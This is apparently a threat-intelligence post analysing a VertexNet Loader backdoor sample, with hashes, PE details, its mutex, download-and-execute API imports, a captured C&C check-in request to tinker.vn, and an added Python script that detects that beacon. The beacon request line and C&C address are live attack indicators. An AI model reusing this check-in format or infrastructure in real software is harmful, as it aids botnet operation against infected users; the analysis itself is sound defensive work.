Generic trojan type backdoor via popular crimeware “Loader”
This is the icon used for this malware.
Technical information & PE file attribute
MD5: aab21e11953aee66ff16772576ceaec0
SHA1: 576910d3ae484144db32dd835594c605dac90a9d
Compiler: Microsoft Visual C++ 8 (VC8 -> Microsoft Corporation)
This malware was created and is spread through crimeware "VertexNet Loader".
PE information & sections:
57.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
12.2% (.DLL) Win32 Dynamic Link Library (generic) (6581/28/2)
12.0% (.EXE) Win32 Executable Generic (6514/8/2)
10.3% (.EXE) Win64 Executable Generic (5563/38/1)
3.7% (.EXE) Generic Win/DOS Executable (2002/3)
Mutex: VN_MUTEX16
Optional Header: 0x400000
Address Of Entry Point: 0xaf4a
Compile Time: 2011-06-20 11:05:05
Number of RVA and Sizes: 16
Number of Sections: 5
API Functions:
InternetReadFile
CreateProcess
WinExec
ShellExecute
URLDownloadToFileA
VT detection rate: 35/42
This information corresponds to the default settings when creating the bot through the internal constructor:
VN_MUTEX16 is the string set as the default mutex by the VertexNet Loader internal constructor (builder):
Information reported in the C&C statistics panel about the infected machine:
This information is inserted into the crimeware's database (MySQL by default). The same check-in, i.e. the C&C communication, can be seen in the traffic capture:
GET /x1/adduser.php?uid={52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}&lan=XXX.XXX.XXX.XXX&cmpname=XXXXXXXXXX-59903E%20[Administrator]&country= &idle=0&ver=v1.2 HTTP/1.1
User-Agent: V32
Host: tinker.vn
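As an added detection example (not part of the original post or of MalwareIntelligence's tooling), the following Python checker flags the check-in beacon shown above by its adduser.php parameter set (uid, lan, cmpname, country, idle, ver) and its bare "V32" User-Agent. The sample request lines are constructed from the masked capture, with the empty country value written without the stray space so the request line parses.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed request samples (request line, User-Agent, Host). The first one
# mirrors the masked beacon in the capture above; the others are controls.
SAMPLE_REQUESTS = [
    ("GET /x1/adduser.php?uid={52bacd1a-7586-11e0-a813-xxxxxxxxxxxx--1962905967}"
     "&lan=XXX.XXX.XXX.XXX&cmpname=XXXXXXXXXX-59903E%20[Administrator]"
     "&country=&idle=0&ver=v1.2 HTTP/1.1", "V32", "tinker.vn"),
    ("GET /index.html HTTP/1.1", "Mozilla/5.0", "example.com"),
    ("GET /x1/adduser.php?uid=abc HTTP/1.1", "Mozilla/5.0", "tinker.vn"),
]

# Query parameters the VertexNet check-in sends, as seen in the capture.
CHECKIN_PARAMS = {"uid", "lan", "cmpname", "country", "idle", "ver"}
CHECKIN_UA = "V32"
REQUEST_LINE = re.compile(r"^(GET|POST)\s+(\S+)\s+HTTP/\d\.\d$")


def score_request(request_line, user_agent, host):
    """Return (is_beacon, reasons) for one HTTP request.

    A request is flagged when its path ends in adduser.php and carries the
    full check-in parameter set, or when it uses the bare 'V32' User-Agent.
    The Host header is not a criterion: tinker.vn is the panel from this
    post, but the C&C location varies per campaign.
    """
    reasons = []
    match = REQUEST_LINE.match(request_line)
    if match:
        url = urlparse(match.group(2))
        params = set(parse_qs(url.query, keep_blank_values=True))
        if url.path.endswith("/adduser.php") and CHECKIN_PARAMS <= params:
            reasons.append("adduser.php check-in with uid/lan/cmpname/country/idle/ver")
    if user_agent == CHECKIN_UA:
        reasons.append("User-Agent 'V32'")
    return bool(reasons), reasons


def find_beacons(requests):
    """Return [(index, host, reasons)] for every request that scores as a beacon."""
    hits = []
    for i, (line, ua, host) in enumerate(requests):
        flagged, reasons = score_request(line, ua, host)
        if flagged:
            hits.append((i, host, reasons))
    return hits


if __name__ == "__main__":
    for i, host, reasons in find_beacons(SAMPLE_REQUESTS):
        print(f"request {i} to {host}: {'; '.join(reasons)}")
```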
You can read more about this crimeware's functions, commands and the data it extracts from the infected machine in the MalwareIntelligence post: VertexNetLoader crimeware timeline, popular functions and marketing scheme
VertexNet Loader crimeware C&C
In this case, the malware's control panel is located at hxxp://tinker.vn/x1/
** Information obtained through the automated malware analysis process of the CrimewareAttack Service (by MalwareIntelligence).
Alex